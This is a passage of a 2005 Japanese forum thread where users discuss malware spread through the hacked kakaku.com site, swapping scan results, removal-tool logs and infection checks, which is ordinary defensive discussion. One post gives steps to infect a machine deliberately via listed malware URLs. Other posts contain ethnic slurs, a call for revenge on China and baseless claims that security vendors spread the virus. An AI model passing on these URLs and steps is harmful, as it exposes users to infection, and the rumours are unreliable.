ここまでで>>555で駆除できたって報告がないところが泣けてくる。

581 :名無しさん@お腹いっぱい。:2005/05/16(月) 16:25:55
>>572
マジですか?
もう一回チェックお願いします

582 :名無しさん@お腹いっぱい。:2005/05/16(月) 16:26:29
Load Damage Cleanup Template (DCT) "C:\Documents and Settings\Administrator\デスクトップ\fix_delfRM\tsc.ptn" (version 999) [success]



何回やってもこれ出るんだけど

583 :名無しさん@お腹いっぱい。:2005/05/16(月) 16:26:32
>>569
マジですか?
もう一回チェックお願いします

584 :名無しさん@お腹いっぱい。:2005/05/16(月) 16:26:45
トレンドマイクロキタ━━(゚∀゚)━( ゚∀)━( ゚)━( )━( )━(・ )━(∀・ )━(・∀・)━イイ!!!!


585 :名無しさん@お腹いっぱい。:2005/05/16(月) 16:26:53
>>580
確かにw
俺の場合実行しても一瞬DOS窓が表示されるだけだった
これは感染してないってことでいいのかな

586 :名無しさん@お腹いっぱい。:2005/05/16(月) 16:27:16
>>548
a02.css a05.css?
それ以外どっち?

それ以外だったら、4個ぐらい適当に選んで調べたけど全部下の通りだった。
Jotti's malware scan

BitDefender Found BehavesLike:Win32.AV-Killer (probable variant)
F-Prot Antivirus Found nothing
Kaspersky Anti-Virus Found Trojan-PSW.Win32.Delf.fz
NOD32 Found Win32/TrojanDownloader.Small.AAO, Win32/PSW.Delf.FZ



587 :名無しさん@お腹いっぱい。:2005/05/16(月) 16:28:12
>>585
LOGがあるよ
でもすぐ終わってるって事は無いってことだと思うけど

これで削除できた人いるの?
出来た人教えて

588 :563:2005/05/16(月) 16:28:19
>>569
あのさ、サンプル持ってるだけじゃだめでしょ
感染させないと
そうじゃないとHDDの全検査をやるようなもんだよ

俺はメンドイのでパス


589 :名無しさん@お腹いっぱい。:2005/05/16(月) 16:28:25
>>585
デスクトップにある「fix_delfRM」フォルダの中のLOG(ry

590 :名無しさん@お腹いっぱい。:2005/05/16(月) 16:29:27
一番厳重なチェック体制でやってるにも関わらず一番早いとは。
さすがトレンドマイクロ。

591 :名無しさん@お腹いっぱい。:2005/05/16(月) 16:29:32
>>569
それって元あった場所に置いてあるの?
ドライブ全検索してるように見えないから、手動で移動させたら反応しないんじゃない?

592 :名無しさん@お腹いっぱい。:2005/05/16(月) 16:29:36
今念のためウイルスチェックを行ったら、Trojan.Dropperっていう2000年だったかのウイルスが十個見つかった。
少し前にチェックしたときは全くでなかったのに(´・ω・`)
kakaku.comのウイルスと何か関係あったりするのかな?バックドア系ウイルスですた。

593 :名無しさん@お腹いっぱい。:2005/05/16(月) 16:29:55
>580
削除できる人はすでにNODとかでやっちゃったんじゃない?

594 :名無しさん@お腹いっぱい。:2005/05/16(月) 16:30:00
ちなみにノートン先生2005です

595 :名無しさん@お腹いっぱい。:2005/05/16(月) 16:30:13
「fix_delfRM」フォルダの中の「debug」フォルダが激しく気になる俺

596 :名無しさん@お腹いっぱい。:2005/05/16(月) 16:30:28
>>594
ちなみにがどこにかかるのか説明希望

597 :569:2005/05/16(月) 16:30:29
>>583
a02.cssの場所変えてみたりもしたが、何度やってもVirus found count(0)のままだ。
もちろん、NOD32の試用版では、ちゃんとウィルスとして検出したヤツ。

598 :名無しさん@お腹いっぱい。:2005/05/16(月) 16:30:42
>>590
社員必死だな。

599 :名無しさん@お腹いっぱい。:2005/05/16(月) 16:30:50
>>595
空だけど?

600 :名無しさん@お腹いっぱい。:2005/05/16(月) 16:30:56
1時間毎くらいにサイトチェックしていたはずなんだけど
BitDefenderで見たら感染していない模様。
どうした人が感染したのか早く教えて欲しいね。

601 :名無しさん@お腹いっぱい。:2005/05/16(月) 16:31:23
>>588
同意。
>>569はこの際、輝く人柱となってくれ。

602 :名無しさん@お腹いっぱい。:2005/05/16(月) 16:31:37
「TROJ_DELF.RM」の動作は以下のとおりです。
システムに自身をインストール
ファイルを作成
情報漏洩
ユーザのキー入力操作情報を収集
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Webサイトからファイルをダウンロード
プロセスの強制終了
Webサイトにアクセス

侵入方法:

他の不正プログラムを介して侵入
悪意のWebサイトを介して侵入
ユーザの手動インストールにより侵入

感染確認方法:

<Windowsシステムフォルダ>※内に "EXPLORER.EXE"、"HTDLL.DLL" というファイルを作成
"GAMEJTT1.TXT" という名称のファイルを作成
レジストリ値を改変

603 :名無しさん@お腹いっぱい。:2005/05/16(月) 16:32:08
トレンドマイクロの駆除ツール実行してみたけど
DOS窓が出てすぐ閉じたんだが
感染してないってことでいいのか?

604 :名無しさん@お腹いっぱい。:2005/05/16(月) 16:32:31
>>595
んだなぁ。感染してるとなんかでてくるのかなぁ。
人柱誰かやってー。俺はパス。

605 :名無しさん@お腹いっぱい。:2005/05/16(月) 16:32:43
>>587,589
産糞

Execute pattern count(1), Virus found count(0), Virus clean count(0), Clean failed count(0)

これを見る限り感染してないようだが信用ならねー


606 :名無しさん@お腹いっぱい。:2005/05/16(月) 16:32:45
実行してみたが感染してなかったみたい。まだ信用できんが一応お礼いっとくか。
 ありがとよ。トレンドマイクロ。                                でもVBはカワネ。

607 :569:2005/05/16(月) 16:33:04
>>588
なるほど。持ってるだけで感染していなければヒットしないのか。
使えるのか使えないのか、よくわからんな・・・

608 :名無しさん@お腹いっぱい。:2005/05/16(月) 16:33:57
変なツール使うより感染確認方法でやれってこった

609 :名無しさん@お腹いっぱい。:2005/05/16(月) 16:34:01
満天ウィルス死ね

610 :名無しさん@お腹いっぱい。:2005/05/16(月) 16:34:32
>603
自分もそうだった。ログ見たが
Execute pattern count(1), Virus found count(0), Virus clean count(0), Clean failed count(0)
となっていた。大丈夫ということだよな?

611 :548:2005/05/16(月) 16:35:03
>>586
お手間をおかけしました。ありがとうございます。
検体として送ろうと思われていたファイルならなんでもよかったんです。
参考になりました。

612 :名無しさん@お腹いっぱい。 :2005/05/16(月) 16:35:19
>>603
漏れは、Bitでスキャンしたら感染してた。Bitで駆除したのに、何回やっても検知するんだが…
その後、トレンドのでやったら、漏れもそうなる

613 :名無しさん@お腹いっぱい。:2005/05/16(月) 16:35:26
価格.comのトップページ今見てもダイジョブ?

614 :名無しさん@お腹いっぱい。:2005/05/16(月) 16:35:55
>>612
ログはどうなってる?

615 :名無しさん@お腹いっぱい。:2005/05/16(月) 16:36:09
>>603
>>589

616 :名無しさん@お腹いっぱい。:2005/05/16(月) 16:36:53
>>613
価格comにはもう近づくな

617 :名無しさん@お腹いっぱい。:2005/05/16(月) 16:37:22
つーかTM信用できないんなら、レジストリエディタで直接調べて修正しろって

618 :名無しさん@お腹いっぱい。 :2005/05/16(月) 16:37:55
>>612
Bitのは、
C:\Documents and Settings\Local Settings\Temporary Internet Files\Content.IE5\SXYFG96B\a02[1].css=>/#.exeSuspect BehavesLike:Win32.AV-Killer
C:\Documents and Settings\Local Settings\Temporary Internet Files\Content.IE5\SXYFG96B\a02[1].css=>/#.exeDeleted
C:\Documents and Settings\Local Settings\Temporary Internet Files\Content.IE5\SXYFG96B\a02[1].cssUpdate failed
Scanned files
となってる

619 :名無しさん@お腹いっぱい。:2005/05/16(月) 16:38:00
いろいろな種類のウイルスに感染している恐れがあるからたちが悪い
しかもそのウイルスが何かもはっきりとわからない
価格コムよウイルス名ぐらい晒す努力しろ

情報漏洩だけに心配でならない
データなんてバックアップしてるから消えたところで問題ないが・・・
再インスコしようかな・・・

620 :名無しさん@お腹いっぱい。:2005/05/16(月) 16:38:16
>>607
検体ファイルにヒットしない=使えないってこと

621 :名無しさん@お腹いっぱい。 :2005/05/16(月) 16:38:32
>>614へですた。
トレンドのは検知せず

622 :名無しさん@お腹いっぱい。:2005/05/16(月) 16:38:45
>>618
キャッシュ削除してやっても一緒?

623 :名無しさん@お腹いっぱい。 :2005/05/16(月) 16:39:37
>>622
キャッシュけしてなかったよ…
ちょっとやってくる

624 :名無しさん@お腹いっぱい。:2005/05/16(月) 16:39:46
結局、動きあるのはトレンドマイクロだけなのか?


625 :名無しさん@お腹いっぱい。:2005/05/16(月) 16:39:58
NOD体験版、名前やメアド登録しなくてもよくなったな

626 :名無しさん@お腹いっぱい。:2005/05/16(月) 16:40:15
俺もログとやらは
Execute pattern count(1), Virus found count(0), Virus clean count(0), Clean failed count(0)
だったな

627 :名無しさん@お腹いっぱい。:2005/05/16(月) 16:40:41
TMだけ対応・・・

ウソくせw

628 :名無しさん@お腹いっぱい。:2005/05/16(月) 16:41:11
いきなりデスクトップにフォルダ作るんじゃねえよ。
せめて実行ファイル置いてたとこに同じ名前で作りやがれ。
デスクトップなんて普段見えねえんだよ。

629 :名無しさん@お腹いっぱい。:2005/05/16(月) 16:41:17
"EXPLORER.EXE"、"HTDLL.DLL"
"GAMEJTT1.TXT"

発見されなかったぜヒャホーイ

630 :名無しさん@お腹いっぱい。:2005/05/16(月) 16:41:32
>>624
ノートンも動いてはいるようだがまだ広報してないからなあ

631 :名無しさん@お腹いっぱい。:2005/05/16(月) 16:41:37
カカクコム株価高杉もっと落ちろや

632 :名無しさん@お腹いっぱい。:2005/05/16(月) 16:42:26
さてさてキャノンにいくら支払ったのか>価格

633 :563:2005/05/16(月) 16:42:38
猿でも解るTMアリガト!(´▽`)と思う為の手段

LANケーブルを抜く
IEであらゆるセキュリティ設定を低く設定して以下のURLを踏む

ttp://www.j4sb.com/count/counter.ap?id=a05
ttp://www.j4sb.com/count/counter.ap?id=a02

--レジストリを見て感染を確認
場所:
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows
値(改変前):
load = ""
値(改変後):
load = "<Windowsシステムフォルダ>\explorer.exe"
---

((((;゚Д゚)))ガクガクブルブルとか思う

http://www.trendmicro.co.jp/support/virus/fix_tool/TROJ_DELF_RM/fix_delfRM.com
をDLして実行

C:\Documents and Settings\???\デスクトップ\fix_delfRM\report\2005****.log
を見る

TMアリガト!(´▽`)と思う
以上ヒトバシラーへ


634 :名無しさん@お腹いっぱい。:2005/05/16(月) 16:42:43
>>629
今回のウイルスがそれだけとは限らないんじゃないか?

635 :名無しさん@お腹いっぱい。:2005/05/16(月) 16:42:49
トレンドマイクロ社が必死すぎて笑えるw

636 :名無しさん@お腹いっぱい。:2005/05/16(月) 16:43:10
閉鎖したあとに
googleの価格ドットコムのキャッシュを見たんだが
その場合でもヤバイのかな?

637 :名無しさん@お腹いっぱい。:2005/05/16(月) 16:44:10
>>624
日本があってのトレンドマイクロ。
こんな時、対応遅かったら使う意味ない。

638 :名無しさん@お腹いっぱい。:2005/05/16(月) 16:44:33
頼むから誰か砂箱で駆除確認してくれ

639 :名無しさん@お腹いっぱい。:2005/05/16(月) 16:44:42
>>636
アウト!ご愁傷様でつ

640 :名無しさん@お腹いっぱい。:2005/05/16(月) 16:45:26
いやトレンドマイクロなんて、対応早くてもどうせみんな製品買わないだろ?w

641 :名無しさん@お腹いっぱい。:2005/05/16(月) 16:45:43
こんな企業が東証1部かよw
東証も終わったな

642 :名無しさん@お腹いっぱい。:2005/05/16(月) 16:46:32
>トレンドマイクロとシマンテックは、ともにNOD32が検出する2つのウイルスを
>検出できたわけではない。トレンドマイクロでは「DELF.RMが今回のウイルス2件を
>全てカバーしているかどうかは不明」とコメント。シマンテックも「PSW.Delf.FZが
>Trojan.Jasbornとどのような関係にあるのか調査しているところ」と、あくまでも
>調査中である点を強調した。
http://internet.watch.impress.co.jp/cda/news/2005/05/16/7604.html

643 :名無しさん@お腹いっぱい。:2005/05/16(月) 16:46:35
トレンドマイクロも駆除ツール出すくらいだから
オンラインスキャンも対応したのかな?

644 :名無しさん@お腹いっぱい。:2005/05/16(月) 16:47:21
>>596
ログみたら・・・
D:\Program Files\Norton Internet Security\Norton AntiVirus\Quarantine\Portal\711704CF.exe

ぉぃぉぃ・・・(・A ・)
誤認かなんかか?

645 :名無しさん@お腹いっぱい。:2005/05/16(月) 16:47:35
>>641
見かけ上一般放出株があれば一部上場出来るんだよ
西○と一緒だね

646 :名無しさん@お腹いっぱい。:2005/05/16(月) 16:48:04
>>636

( ^ω^)・・・
 (⊃⊂)


  (^ω^;)⊃ アウアウ!!
 ⊂ミ⊃ )
  /   ヽ

647 :名無しさん@お腹いっぱい。 :2005/05/16(月) 16:48:11
>>622
キャッシュ消したら検知せず
∩( ・ω・)∩ ばんじゃーい

648 :名無しさん@お腹いっぱい。:2005/05/16(月) 16:48:55
トレンドのオンラインスキャンではa02.cssは引っかからなかった。
ウィルス発動後のファイルにしか反応しないのか?

649 :名無しさん@お腹いっぱい。:2005/05/16(月) 16:49:41
>>642
TMとシマンテック、いってることが全然違う…

650 :名無しさん@お腹いっぱい。:2005/05/16(月) 16:49:50
情報が少なすぎる

価格.comのトップページを開くと感染するのか?
価格.comのトップページ以外でも開くと感染するのか?

ActiveXやjavaをoffにしてると大丈夫なのか?
scriptもoffにしてると大丈夫なのか?
それとも、これら全部offでもダメなのか?

651 :名無しさん@お腹いっぱい。:2005/05/16(月) 16:50:53
>648
急造っぽいからそうなんじゃない?
VBで対応するならそっちも検出するだろうけど

652 :名無しさん@お腹いっぱい。:2005/05/16(月) 16:51:16
>>647
ヨカッタナ

653 :名無しさん@お腹いっぱい。:2005/05/16(月) 16:52:09
さて今度から価格ドットコムにアクセスする時は
Virtual PC越しにアクセスすることにするか・・・

654 :名無しさん@お腹いっぱい。:2005/05/16(月) 16:52:54
去年から価格.com利用してない俺はカチ組

655 :名無しさん@お腹いっぱい。:2005/05/16(月) 16:53:51
http://www.kakaku.com/
       ↑
  ブラクラリスト入り

656 :名無しさん@お腹いっぱい。:2005/05/16(月) 16:53:52
価格なんてほとんど見てない俺は勝ち組




でもexplorer.exeがあった、いやこれは普通のファイルだよな?

657 :名無しさん@お腹いっぱい。:2005/05/16(月) 16:54:02
>>654
でもさー、googleで何か検索して、検索結果を表示したら、そこが価格.comの中だったって事はないかい?


658 :名無しさん@お腹いっぱい。:2005/05/16(月) 16:54:16
で、XP2 で windows update してれば大丈夫なんだろ?
アンチウイルスなんかに踊らされんな。

659 :名無しさん@お腹いっぱい。:2005/05/16(月) 16:54:41
>654
実は去年から改ざんされてて、今頃気づいた
なんてことはないよな、流石に

660 :名無しさん@お腹いっぱい。:2005/05/16(月) 16:55:10
>>656
実行してみそ

661 :名無しさん@お腹いっぱい。:2005/05/16(月) 16:55:31
>>650
それらが全部OFFでも iFrame の脆弱性がどうこう、って問題があった気がする。

662 :名無しさん@お腹いっぱい。:2005/05/16(月) 16:56:05
犯人はPCサクソス

663 :名無しさん@お腹いっぱい。:2005/05/16(月) 16:56:32
>>658
大丈夫じゃないから、騒がれとる

664 :名無しさん@お腹いっぱい。:2005/05/16(月) 16:57:30
ざまあみろ、価格.comは糞会社サクセスの提灯持ちのくせしやがって。
客をなめてる会社なんか潰れりゃいいんだよ。


665 :名無しさん@お腹いっぱい。:2005/05/16(月) 16:57:35
>>654
久しぶりに利用してしかも普段はscript切ってるのにその日に限って裸同然でアクセスしてしまった俺は負け組みorz

666 :名無しさん@お腹いっぱい。:2005/05/16(月) 16:57:48
>>658
トレンドマイクロの場合はSP2を入れてたらアウト・・・・

667 :名無しさん@お腹いっぱい。:2005/05/16(月) 16:59:17
あーもう・・・こんな事で4時間つぶした・・・。 まだノートPCしかチェックしてないし。 もーいや。
 謝罪と賠償を(以下略

668 :名無しさん@お腹いっぱい。:2005/05/16(月) 16:59:53
http://internet.watch.impress.co.jp/cda/news/2005/05/16/7604.html
同社広報によればOutlook Expressの脆弱性(MS04-013)を悪用し、
ウイルスをダウンロードさせるWebページにリダイレクトさせるものだという。

なあ、俺の指摘通りだろう
やっぱりこれ経由でのインストールなんだよ
http://www.mcafeesecurity.com/japan/security/virE2004.asp?v=Exploit-MhtRedir
http://www.microsoft.com/japan/technet/treeview/default.asp?url=/japan/technet/security/bulletin/ms04-013.asp

669 :名無しさん@お腹いっぱい。:2005/05/16(月) 17:01:21
>>668
誰だおまいは(・∀・)

670 :名無しさん@お腹いっぱい。:2005/05/16(月) 17:01:32
>>663
キャッシュに入ってるファイルが検出されてビビってるだけだろ?
無問題なのに、アンチウイルス会社に煽られてるだけってことに気付けよ。カス

671 :名無しさん@お腹いっぱい。:2005/05/16(月) 17:02:03
Pen4HTTの脆弱製といい、TMの不祥事といい、今年は大変だな
まだなんかありそうな悪寒

672 :名無しさん@お腹いっぱい。:2005/05/16(月) 17:02:35
>>1-671 あんたら、もうええわ、社長を呼んで

673 :名無しさん@お腹いっぱい。:2005/05/16(月) 17:02:55
次スレ候補

価格ドットコムが落ちぶれた件について

674 :名無しさん@お腹いっぱい。:2005/05/16(月) 17:03:29
>>633
VMWareを使って、仮想マシーンで試した方が良いんじゃない。

675 :名無しさん@お腹いっぱい。:2005/05/16(月) 17:04:10
>>672
TMの不祥事の次の日だっけ?JRが脱線したの?
あの時はビックリしたよ

676 :名無しさん@お腹いっぱい。:2005/05/16(月) 17:04:17
>>668
http://www.mcafeesecurity.com/japan/security/virE2004.asp?v=Exploit-MhtRedir.gen
これも

677 :563:2005/05/16(月) 17:05:34
ttp://j-rmt.com/
ここもやられてるらしい
iframeに例のURLがある
こりゃ沢山あるかもね〜
カカクコムのみだけじゃないってことだと
やっぱ中国絡みかも知れない


678 :名無しさん@お腹いっぱい。:2005/05/16(月) 17:05:59
>>670
そなの?俺XP2なんてOS持ってないから、わかんねやw

679 :名無しさん@お腹いっぱい。:2005/05/16(月) 17:06:25
先週からほぼ毎日価格com見てたんだが、HTDLL.DLLもなかったし
レジストリも弄られてないようなんだがこれは感染してないってことなの?
WinXPsp2でWindowsupdateは自動。NIS2005は入っています。

680 :名無しさん@お腹いっぱい。:2005/05/16(月) 17:06:29
うちは感染してないようで、とりあえず一安心だが
いい加減IEは捨てた方がいいかも知れないな
おまいら、ブラウザ何使ってるよ

681 :名無しさん@お腹いっぱい。:2005/05/16(月) 17:06:53
新しいウイルスだったんだな。
ってことはNODがいち早く対応していたのは何故か・・・

682 :名無しさん@お腹いっぱい。:2005/05/16(月) 17:07:16
HotJava

683 :名無しさん@お腹いっぱい。:2005/05/16(月) 17:07:52
楽天ウィルス感染者数増加52人(トレンドマイクロ)

684 :名無しさん@お腹いっぱい。:2005/05/16(月) 17:08:42
次スレ候補

【疑惑・困惑】 価格comクラック?管理者ヘタレ?何故にNODが? 【跳梁跋扈】 

685 :名無しさん@お腹いっぱい。:2005/05/16(月) 17:08:54
IEコンポーネントと関係ないのとなれば、火狐しか候補がない。

686 :名無しさん@お腹いっぱい。:2005/05/16(月) 17:09:16
なんか感染者増えないから
かなり古い穴塞いでなかった奴とかしか引っかからないって説が正しいのかもな

687 :名無しさん@お腹いっぱい。:2005/05/16(月) 17:09:38
支那が怪しいな

688 :名無しさん@お腹いっぱい。:2005/05/16(月) 17:10:26
>>685
Opera

689 :名無しさん@お腹いっぱい。:2005/05/16(月) 17:10:29
工作員の休業補償はしてくれるんだろうな

690 :ほりえ:2005/05/16(月) 17:10:43
Operaの企業価値を上げたいのです

691 :名無しさん@お腹いっぱい。:2005/05/16(月) 17:10:51
>>687
9割方シナだろ

692 :名無しさん@お腹いっぱい。:2005/05/16(月) 17:11:13
次スレ候補

【疑惑・困惑】 価格comクラック?満天ウィルス増加中 【跳梁跋扈】 

693 :名無しさん@お腹いっぱい。:2005/05/16(月) 17:12:38
アヤスィ

694 :名無しさん@お腹いっぱい。:2005/05/16(月) 17:12:40
喪前らもちつけ

今の所、TMとノートン先生って片方ずつだよな?
両方対応してるのNOD32だけ?

695 :名無しさん@お腹いっぱい。:2005/05/16(月) 17:12:59
shtml.com重すぎ。やっと全部終わった。 0x61.comは404だったのでパス。
j4sb.comと微妙に違うやつだけどこっちも検出率悪いな。

結果は全部同じ結果で下の通りでつ。
NOD32かBitDefenderが入ってるなら安心してもよさそう。

Antivirus Version Update Result
AntiVir 6.30.0.12 05.13.2005 no virus found
AVG 718 05.13.2005 no virus found
Avira 6.30.0.12 05.13.2005 no virus found
BitDefender 7.0 05.16.2005 Dropped:Trojan.PWS.Lineage.CI
ClamAV devel-20050501 05.15.2005 no virus found
DrWeb 4.32b 05.16.2005 no virus found
eTrust-Iris 7.1.194.0 05.15.2005 no virus found
eTrust-Vet 11.9.1.0 05.16.2005 no virus found
Fortinet 2.51 05.15.2005 no virus found
Ikarus 2.32 05.15.2005 no virus found
Kaspersky 4.0.2.24 05.16.2005 no virus found
McAfee 4491 05.13.2005 no virus found
NOD32v2 1.1097 05.15.2005 Win32/TrojanDownloader.Small.AAO
Norman 5.70.10 05.13.2005 no virus found
Panda 8.02.00 05.15.2005 no virus found
Sybari 7.5.1314 05.16.2005 no virus found
Symantec 8.0 05.15.2005 no virus found
VBA32 3.10.3 05.16.2005 no virus found

696 :名無しさん@お腹いっぱい。:2005/05/16(月) 17:13:35
255 名前:名無しさん@5周年[] 投稿日:2005/05/16(月) 12:57:16 ID:+VguF0Vj

犯人は中国(おそらく北京)の反日組織です。証拠を発見しました。

スクリプトの拡張子が普通じゃないのに注目して、"count/counter.ap?id="をググってみると、

ttp://www.google.com/search?q=%22count%2Fcounter.ap%3Fid%3D%22

j4sb.com以外に shtm1.com と 0x61.com が同じスクリプトを走らせていることが分かります。
whoisでこれらのサイト情報を検索すると

ttp://whois.ansi.co.jp/?key=shtm1.com
ttp://whois.ansi.co.jp/?key=0x61.com

Admin Name........... pi ger
Admin Address........ hidden
Admin Address........
Admin Address........ Beijing
Admin Address........ 123456
Admin Address........ BJ
Admin Address........ CN
Admin Email.......... fuckjpmm@china.com
Admin Phone.......... +86.1012345678
Admin Fax............ +86.1012345678

と出てきます。 fuckjpmm とは "Fuck Japanese!" 
どう見ても反日です。
警察に通報して、外交問題にしてください。
まとめサイトの方、よろしく。

697 :名無しさん@お腹いっぱい。:2005/05/16(月) 17:14:04
>>694
ノートン片方は元から対応してたかも、、、
よくわかんね

698 :名無しさん@お腹いっぱい。:2005/05/16(月) 17:14:09
>>695
オツカレイヤー

699 :名無しさん@お腹いっぱい。:2005/05/16(月) 17:14:36
bitdefender入れてみたら、今回のには感染してなかったけど、
全然違うのが見つかったよ ̄|_|○
NAVダメじゃん

700 :名無しさん@お腹いっぱい。:2005/05/16(月) 17:14:51
>>681
しーーっ

701 :名無しさん@お腹いっぱい。:2005/05/16(月) 17:15:27
NOD32がうpだてできないorz
「サーバ接続に失敗しました」ってなんで?

"EXPLORER.EXE"、"HTDLL.DLL" "GAMEJTT1.TXT" は無かったし
ノートン先生手動うp→スキャンも無問題だったし
BDのオンラインスキャンでも検出されなかったし

もうアンインスコしていい?

702 :名無しさん@お腹いっぱい。:2005/05/16(月) 17:15:30
Outlook Expressつかってなければ問題ないの?

703 :名無しさん@お腹いっぱい。:2005/05/16(月) 17:16:12
>>699
誤診ってことはないのか?

704 :名無しさん@お腹いっぱい。:2005/05/16(月) 17:16:15
>>695
あれ?まだ対応してないのか?

705 :名無しさん@お腹いっぱい。:2005/05/16(月) 17:18:41
更新キタ━━━━━━(゚∀゚)━━━━━━ !!!!!
ノートンスルーwww


【重要なお知らせ3】
当社運営サイトを閲覧されたユーザーの方々へのセキュリティ対策のご報告
2005/5/16 17:00


706 :名無しさん@お腹いっぱい。:2005/05/16(月) 17:18:55
>>695
ノートン先生は>>515にあるrapidrelease版でも全く検出できなかった

面倒だけど検体送るか λ....

707 :名無しさん@お腹いっぱい。:2005/05/16(月) 17:19:11
問題は価格.COMが何処のセキュリティソフトでチェックをしていて、
>>668のコードを見逃していたかなんだよ
一番狙われている過去のセキュリティホールなんだからよ

インストールされたトロイが新種か亜種で、
各セキュリティソフトが対応していない事などでははない

708 :名無しさん@お腹いっぱい。:2005/05/16(月) 17:20:22
今回のウイルスってキヤノンシステムソリューションズがばら撒いたの?

709 :名無しさん@お腹いっぱい。:2005/05/16(月) 17:21:37
アンチトロイで更新がほぼ毎日あるらしいewidoでは検出されてないのかな?
ewido【Trojan Horsesが気になる貴方に】
http://pc8.2ch.net/test/read.cgi/sec/1098285373/

710 :名無しさん@お腹いっぱい。:2005/05/16(月) 17:21:47
>>708
おいおい、セキュリティ企業がウイルスばら撒いてるなんて物騒なこと言うなよww

711 :名無しさん@お腹いっぱい。:2005/05/16(月) 17:22:09
しかし実際に感染してた奴って2ちゃんでもいないんじゃないのか?

712 :名無しさん@お腹いっぱい。:2005/05/16(月) 17:22:27
>>710
だって、今回の騒動でもっとも「得」をするのはキヤノンシステムソリューションズだよね?

713 :名無しさん@お腹いっぱい。:2005/05/16(月) 17:24:17
冗談は顔だけにしとけ

714 :名無しさん@お腹いっぱい。:2005/05/16(月) 17:24:18
>>711
ノシ

715 :名無しさん@お腹いっぱい。:2005/05/16(月) 17:25:00
cssはキャッシュにあったが
これは感染とは言わないのか?

716 :名無しさん@お腹いっぱい。:2005/05/16(月) 17:25:04
Microsoft AntiSpywareの対応はまだですか?

717 :名無しさん@お腹いっぱい。:2005/05/16(月) 17:25:37
記者会見はどこで何時から??

718 :名無しさん@お腹いっぱい。:2005/05/16(月) 17:26:16
>>699
相変わらずの誤報だろ
今回のはまぐれ当たり

719 :名無しさん@お腹いっぱい。:2005/05/16(月) 17:27:06
新しいウィルスにいきなり対応できたキヤノンシステムソリューションズ
について落ち着いて話し合う段階にボチボチなってきたな。


720 :名無しさん@お腹いっぱい。:2005/05/16(月) 17:27:32
>>715
スピーカの音量上げて
IEを再起動とかホームを連打してみて

721 :名無しさん@お腹いっぱい。:2005/05/16(月) 17:27:46
サイトの改ざんを許している時点で、お粗末としかいいようがないわけで。
改ざんされたサイトを閲覧したセキュリティレベルの低い閲覧者が感染したと
いうことね。どういう経路で改ざんされたかは、まだ不明と。

722 :名無しさん@お腹いっぱい。:2005/05/16(月) 17:28:04
>>715
言わない。

723 :名無しさん@お腹いっぱい。:2005/05/16(月) 17:29:12
http://www.kakaku.com

ノートンヤバスwww



724 :名無しさん@お腹いっぱい。:2005/05/16(月) 17:29:16
>>721
閲覧者への感染経路が今のとこ不確定
だけど広がり具合からいくとあんまり感染力なさそう

725 :名無しさん@お腹いっぱい。:2005/05/16(月) 17:30:04
どうしてもキヤノン叩きたいやつがおるなw

726 :名無しさん@お腹いっぱい。:2005/05/16(月) 17:30:14
>>217
>>217
>>217
>>217
>>217


727 :名無しさん@お腹いっぱい。:2005/05/16(月) 17:30:38
まぐれか自作自演かと言われれば、後者だわな(`・ω・´) シャキーン

728 :名無しさん@お腹いっぱい。:2005/05/16(月) 17:30:50
>>719
今回のキヤノンシステムソリューションズの対応は
まるでイラクで3人が人質になった瞬間に
札幌ではじまった自衛隊撤退署名運動のように手際が良いね。

729 :名無しさん@お腹いっぱい。:2005/05/16(月) 17:31:53
誰かシナに報復してきて

730 :名無しさん@お腹いっぱい。:2005/05/16(月) 17:32:11
どーすりゃa02.cssが実行されるわけよ。

731 :名無しさん@お腹いっぱい。:2005/05/16(月) 17:34:31
>>217、もろ感染してるじゃん・・・
トレマイの報告どおり

732 :名無しさん@お腹いっぱい。:2005/05/16(月) 17:35:15
現時点で「カカクコムのWebサイトが原因でウイルスに感染したケース
はないと認識している」

またカカクコムは,対象となるウイルスを検知・削除できる対策ソフト(キヤノン
システムソリューションズの製品体験版)を,自社のサイトで16日から配布し始
めた。ただし,すでに他社のウイルス対策ソフトを導入しているユーザーはソフ
トウエアが競合する可能性があるため,このソフトは併用できない。「他社製品
のユーザーがどのように対処すれば良いのかは,各ウイルス対策ソフトのベンダ
ーと話し合っている最中。新しい種類のウイルスであるとの情報もある」(広報室)
。ただし現時点で「カカクコムのWebサイトが原因でウイルスに感染したケース
はないと認識している」(同)という。
http://itpro.nikkeibp.co.jp/free/NCC/NEWS/20050516/160876/

733 :名無しさん@お腹いっぱい。:2005/05/16(月) 17:35:52
>>730
http://vegalv50.nyx.bne.jp/misc/security/?id=case-site#jrmt

734 :名無しさん@お腹いっぱい。:2005/05/16(月) 17:36:38
これ客だけじゃなくて業者もヤバイんでないの?

735 :名無しさん@お腹いっぱい。:2005/05/16(月) 17:37:47
>>728
あのな普通は体験版を宣伝したから、キャノンが価格コムに金払うのが常識。
価格コムのリンクから体験版を落としたら価格コムに1件につき0.1円程度ね(笑


736 :名無しさん@お腹いっぱい。:2005/05/16(月) 17:37:54
ニュー速+の新スレ↓
そこはかとなく住み分けて行きましょう〜

【ネット】"価格.com"、ハッキングで閉鎖。復旧に1週間…閲覧者、ウイルス感染か★5
http://news19.2ch.net/test/read.cgi/newsplus/1116232495/

737 :名無しさん@お腹いっぱい。:2005/05/16(月) 17:38:33
>>730
拡張子を chm にリネームして手動で起動する、とか?

738 :名無しさん@お腹いっぱい。:2005/05/16(月) 17:39:43
このウィルスって感染するとどうなるの?

739 :名無しさん@お腹いっぱい。:2005/05/16(月) 17:41:34
【kakaku.com】データ改ざん、閲覧者ウイルスに感染
http://news19.2ch.net/test/read.cgi/news/1116186996/

740 :名無しさん@お腹いっぱい。:2005/05/16(月) 17:42:02
>>701
今さっきNOD32ダウンロードしてやってみたけど、更新できたよ。
ユーザー名とパスワード入れた?(価格コムに書いてあるやつ)

741 :名無しさん@お腹いっぱい。:2005/05/16(月) 17:42:42
>>733
よーわからんが
ITSプロトコロハンドラの脆弱性によってhtmlから起動させられるってこと?
そのhtmlはkakakuにもあったってこと?

742 :名無しさん@お腹いっぱい。:2005/05/16(月) 17:44:28
>>633
いや、LANケーブル抜いたらurl踏めねぇべ。

743 :名無しさん@お腹いっぱい。:2005/05/16(月) 17:48:56
>>733
へぇ、だからLineageがウィルス名の中に入ってるのか

744 :名無しさん@お腹いっぱい。:2005/05/16(月) 17:49:02
ttp://kiken.jp/pc/jisaku/data/20050403214135/img20050403214135.jpg


745 :名無しさん@お腹いっぱい。:2005/05/16(月) 17:49:15
>>742
ヒント:ダイヤルアップ

746 :名無しさん@お腹いっぱい。:2005/05/16(月) 17:49:38
またバカが来たか

